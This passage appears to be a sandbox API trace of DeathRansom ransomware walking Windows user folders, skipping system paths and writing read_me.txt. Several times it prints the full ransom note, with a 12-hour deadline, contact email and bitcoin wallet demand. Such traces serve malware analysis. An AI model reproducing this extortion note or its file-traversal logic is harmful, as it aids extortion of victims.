ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.509] WriteFile (in: hFile=0x764, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.510] CloseHandle (hObject=0x764) returned 1 [0076.510] GetProcessHeap () returned 0x4f10000 [0076.510] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c00108 | out: hHeap=0x4f10000) returned 1 [0076.510] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Searches", cAlternateFileName="")) returned 1 [0076.510] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches") returned 29 [0076.510] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0076.510] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0076.510] StrStrW (lpFirst="searches", lpSrch="programdata") returned 0x0 [0076.511] StrStrW (lpFirst="searches", lpSrch="$recycle.bin") returned 0x0 [0076.511] StrStrW (lpFirst="searches", lpSrch="program files") returned 0x0 [0076.511] StrStrW (lpFirst="searches", lpSrch="windows") returned 0x0 [0076.511] StrStrW (lpFirst="searches", lpSrch="all users") returned 0x0 [0076.511] StrStrW (lpFirst="searches", lpSrch="appdata") returned 0x0 [0076.511] GetProcessHeap () returned 0x4f10000 [0076.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c00108 [0076.511] lstrcpyW (in: lpString1=0x8c00108, lpString2="\\\\?\\C:\\Users\\Default\\Searches" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches") returned="\\\\?\\C:\\Users\\Default\\Searches" [0076.511] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 117 [0076.511] QueueUserWorkItem (Function=0x40a710, Context=0x8c00108, Flags=0x0) returned 1 [0076.511] GetProcessHeap () returned 0x4f10000 [0076.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ca0058 [0076.512] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\*") returned 31 [0076.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.558] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\.") returned 31 [0076.558] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.558] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.558] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.558] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\..") returned 32 [0076.558] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.558] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.558] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0076.558] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0076.558] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned 50 [0076.558] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0076.558] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned 57 [0076.558] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0076.558] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.559] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\read_me.txt") returned 41 [0076.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\read_me.txt" (normalized: "c:\\users\\default\\searches\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x764 [0076.560] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.560] WriteFile (in: hFile=0x764, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.561] CloseHandle (hObject=0x764) returned 1 [0076.561] GetProcessHeap () returned 0x4f10000 [0076.561] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ca0058 | out: hHeap=0x4f10000) returned 1 [0076.561] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="SendTo", cAlternateFileName="")) returned 1 [0076.561] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo") returned 27 [0076.561] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0076.561] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0076.561] StrStrW (lpFirst="sendto", lpSrch="programdata") returned 0x0 [0076.561] StrStrW (lpFirst="sendto", lpSrch="$recycle.bin") returned 0x0 [0076.561] StrStrW (lpFirst="sendto", lpSrch="program files") returned 0x0 [0076.562] StrStrW (lpFirst="sendto", lpSrch="windows") returned 0x0 [0076.562] StrStrW (lpFirst="sendto", lpSrch="all users") returned 0x0 [0076.562] StrStrW (lpFirst="sendto", lpSrch="appdata") returned 0x0 [0076.562] GetProcessHeap () returned 0x4f10000 [0076.562] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ca0058 [0076.562] lstrcpyW (in: lpString1=0x8ca0058, lpString2="\\\\?\\C:\\Users\\Default\\SendTo" | out: lpString1="\\\\?\\C:\\Users\\Default\\SendTo") returned="\\\\?\\C:\\Users\\Default\\SendTo" [0076.562] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 118 [0076.562] QueueUserWorkItem (Function=0x40a710, Context=0x8ca0058, Flags=0x0) returned 1 [0076.562] GetProcessHeap () returned 0x4f10000 [0076.562] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cb0060 [0076.563] wnsprintfW (in: pszDest=0x8cb0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo\\*") returned 29 [0076.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.563] wnsprintfW (in: pszDest=0x8cb0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo\\read_me.txt") returned 39 [0076.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\read_me.txt" (normalized: "c:\\users\\default\\sendto\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c4 [0076.649] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.649] WriteFile (in: hFile=0x7c4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.650] CloseHandle (hObject=0x7c4) returned 1 [0076.650] GetProcessHeap () returned 0x4f10000 [0076.650] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cb0060 | out: hHeap=0x4f10000) returned 1 [0076.650] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0076.650] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu") returned 31 [0076.650] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0076.650] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0076.650] StrStrW (lpFirst="start menu", lpSrch="programdata") returned 0x0 [0076.650] StrStrW (lpFirst="start menu", lpSrch="$recycle.bin") returned 0x0 [0076.650] StrStrW (lpFirst="start menu", lpSrch="program files") returned 0x0 [0076.650] StrStrW (lpFirst="start menu", lpSrch="windows") returned 0x0 [0076.650] StrStrW (lpFirst="start menu", lpSrch="all users") returned 0x0 [0076.650] StrStrW (lpFirst="start menu", lpSrch="appdata") returned 0x0 [0076.650] GetProcessHeap () returned 0x4f10000 [0076.650] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cb0060 [0076.650] lstrcpyW (in: lpString1=0x8cb0060, lpString2="\\\\?\\C:\\Users\\Default\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\Default\\Start Menu") returned="\\\\?\\C:\\Users\\Default\\Start Menu" [0076.650] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 119 [0076.650] QueueUserWorkItem (Function=0x40a710, Context=0x8cb0060, Flags=0x0) returned 1 [0076.651] GetProcessHeap () returned 0x4f10000 [0076.651] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cc0068 [0076.652] wnsprintfW (in: pszDest=0x8cc0068, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu\\*") returned 33 [0076.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="\x07")) returned 0xffffffff [0076.652] wnsprintfW (in: pszDest=0x8cc0068, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu\\read_me.txt") returned 43 [0076.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\read_me.txt" (normalized: "c:\\users\\default\\start menu\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c4 [0076.652] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.652] WriteFile (in: hFile=0x7c4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.653] CloseHandle (hObject=0x7c4) returned 1 [0076.653] GetProcessHeap () returned 0x4f10000 [0076.653] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cc0068 | out: hHeap=0x4f10000) returned 1 [0076.653] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0076.653] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates") returned 30 [0076.653] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0076.653] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0076.653] StrStrW (lpFirst="templates", lpSrch="programdata") returned 0x0 [0076.654] StrStrW (lpFirst="templates", lpSrch="$recycle.bin") returned 0x0 [0076.654] StrStrW (lpFirst="templates", lpSrch="program files") returned 0x0 [0076.654] StrStrW (lpFirst="templates", lpSrch="windows") returned 0x0 [0076.654] StrStrW (lpFirst="templates", lpSrch="all users") returned 0x0 [0076.654] StrStrW (lpFirst="templates", lpSrch="appdata") returned 0x0 [0076.654] GetProcessHeap () returned 0x4f10000 [0076.654] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cc0068 [0076.654] lstrcpyW (in: lpString1=0x8cc0068, lpString2="\\\\?\\C:\\Users\\Default\\Templates" | out: lpString1="\\\\?\\C:\\Users\\Default\\Templates") returned="\\\\?\\C:\\Users\\Default\\Templates" [0076.654] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 120 [0076.654] QueueUserWorkItem (Function=0x40a710, Context=0x8cc0068, Flags=0x0) returned 1 [0076.654] GetProcessHeap () returned 0x4f10000 [0076.654] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cd0070 [0076.655] wnsprintfW (in: pszDest=0x8cd0070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates\\*") returned 32 [0076.655] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, 